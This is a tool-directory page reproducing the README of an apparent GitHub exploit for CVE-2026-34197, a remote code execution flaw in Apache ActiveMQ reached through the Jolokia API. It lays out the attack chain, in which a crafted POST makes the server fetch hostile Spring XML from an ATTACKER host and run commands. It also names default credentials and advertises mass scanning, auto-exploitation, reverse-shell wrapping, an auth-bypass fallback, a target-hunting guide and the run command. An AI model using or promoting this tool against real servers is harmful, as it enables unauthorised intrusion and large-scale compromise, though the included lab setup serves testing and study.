Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/kondordevsecuritycorp/cve-2026-34197
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationPenetration TestingRed TeamingLabs & Practice
GitHub
kondordevsecuritycorp/cve-2026-34197

CVE-2026-34197

Exploit for Apache ActiveMQ RCE via Jolokia API (CVE-2026-34197) with command output capture, mass scanning, and auto-exploitation.

View Repository
21155 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-34197 CVSS 9.8 RCE Python 3.8+

Apache ActiveMQ Jolokia Spring

CVE-2026-34197

Apache ActiveMQ Remote Code Execution via Jolokia API

Author Stars Forks Issues License

Overview • Details • Attack Flow • Quick Start • ATTACKER_IP Guide • Usage • Output Capture • Scanner • Hunting • Detection • Remediation


Overview

CVE-2026-34197 is a critical Remote Code Execution (RCE) vulnerability in Apache ActiveMQ Classic that allows an authenticated attacker to execute arbitrary operating system commands through the Jolokia API exposed on the web console.

The vulnerability has existed for over 13 years and resides in the interaction between Jolokia (HTTP-JMX bridge), ActiveMQ MBeans, network connectors, and the VM transport.

[!CAUTION] This is a first public PoC developed by KONDOR DEV SECURITY. Use only in authorized security assessments.

Key Features

  • Command output capture — simple commands (id, whoami, cat /etc/passwd) automatically display their output in your terminal
  • Auto base64 wrapping — reverse shells and special characters work without manual escaping
  • 2-phase scanner (version_check.py) — multithreaded version detection + targeted exploitation
  • Auth fallback — automatically tries no-auth if credentials fail (CVE-2024-32114)
  • Smart broker detection — auto-detects the broker name via Jolokia wildcard queries

Vulnerability Details

CVE IDCVE-2026-34197
Severity CVSS 3.1
TypeRemote Code Execution (RCE)
CWECWE-20 (Improper Input Validation) / CWE-94 (Code Injection)
AffectedActiveMQ Classic < 5.19.4 and 6.0.0 — 6.2.2
Patched5.19.4 / 6.2.3
Auth RequiredYes (default credentials admin:admin are common)
No Auth Needed6.0.0 — 6.1.1 (due to CVE-2024-32114)
Default Port8161 (web console)

Attack Flow

                    CVE-2026-34197 — Exploitation Chain
 ──────────────────────────────────────────────────────────────

   ATTACKER                                 ACTIVEMQ SERVER
   ────────                                 ───────────────
       │                                          │
   [1] │── POST /api/jolokia/ ──────────────────>│
       │   addNetworkConnector(                   │
       │     vm://rce?brokerConfig=               │
       │     xbean:http://ATTACKER/payload.xml)   │
       │                                          │
       │                                     [2]  │── Creates VM broker
       │                                          │── Fetches remote XML
       │                                          │
   [3] │<── GET /payload.xml ─────────────────────│
       │── Serves malicious Spring XML ─────────>│
       │                                          │
       │                                     [4]  │── Spring instantiates beans
       │                                          │── Runtime.exec(COMMAND)
       │                                          │── ** RCE ACHIEVED **
       │                                          │
   [5] │<── POST /output (command stdout) ────────│  (auto, for simple commands)
       │── Displays command output                │
       │                                          │

Step-by-step breakdown

StepActionComponent
1Attacker sends POST to /api/jolokia/ invoking addNetworkConnector on the Broker MBeanJolokia API
2ActiveMQ processes the vm:// transport URI and creates an ephemeral broker with brokerConfig pointing to a remote URLVM Transport
3The xbean: scheme triggers download of a Spring XML configuration file from the attacker's serverSpring / XBean
4Spring instantiates all beans in the XML, including one that calls Runtime.getRuntime().exec()Spring Context
5For simple commands, the output is captured and sent back via HTTP POST to the attacker's listener (automatic)Output Capture

Project Structure

CVE-2026-34197/
├── exploit.py             # PoC exploit (single target + mass scan)
├── version_check.py       # Scanner + Auto-Exploit (2-phase pipeline)
├── payloads/
│   └── template.xml       # Spring XML payload template
├── targets.txt            # Target URLs (one per line)
├── docker/
│   └── docker-compose.yml # Vulnerable lab environment
├── docs/
│   ├── HUNTING_GUIDE_EN.md  # Target hunting guide (English)
│   └── HUNTING_GUIDE_ES.md  # Guía de búsqueda (Español)
├── LICENSE
└── README.md

Quick Start

Prerequisites

# Python 3.8+ required
pip install requests

Lab Environment (Docker)

cd docker
docker-compose up -d
# ActiveMQ Classic 5.18.6 (vulnerable) → localhost:8161

Run the Exploit

# Single target
python exploit.py -t http://TARGET:8161 -l YOUR_IP -c "id"
Download Tool